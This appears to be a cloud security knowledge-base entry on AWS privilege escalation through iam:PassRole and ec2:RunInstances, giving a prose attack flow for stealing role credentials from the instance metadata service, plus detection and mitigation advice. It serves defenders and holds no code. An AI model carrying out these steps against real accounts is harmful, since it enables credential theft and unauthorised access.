PassRole to EC2

high

Privilege Escalation

An attacker with iam:PassRole and ec2:RunInstances can launch an EC2 instance with a privileged instance profile and access its credentials via IMDS.

Required Permissions

iam:PassRoleec2:RunInstances

Description

This technique uses iam:PassRole combined with ec2:RunInstances to launch a new EC2 instance with a highly privileged instance profile attached.

The attack flow: 1. Identify an instance profile with a powerful IAM role 2. Launch a new EC2 instance with that instance profile and the attacker's SSH key or user data script 3. Connect to the instance and query the Instance Metadata Service (IMDS) at 169.254.169.254 4. Retrieve temporary credentials for the attached role 5. Use those credentials to perform privileged actions

This is particularly effective because instance profiles often have broad permissions for application deployments, and the temporary credentials from IMDS are valid for several hours.

Impact

Access to all permissions of the instance profile role. Credentials are accessible via IMDS and valid for hours.

Detection

Monitor for ec2:RunInstances calls with high-privilege instance profiles. Alert on new instances launched with unusual AMIs or user data.

Mitigation

Scope iam:PassRole to specific role ARNs. Require IMDSv2 (hop limit 1) to prevent SSRF-based credential theft. Apply least privilege to instance profiles.

Related Techniques

PassRole to Lambda

An attacker with iam:PassRole and lambda:CreateFunction can create a Lambda function with a privileged execution role and invoke it to escalate privileges.

IMDS Credential Theft

An attacker with access to an EC2 instance can retrieve temporary IAM credentials from the Instance Metadata Service (IMDS).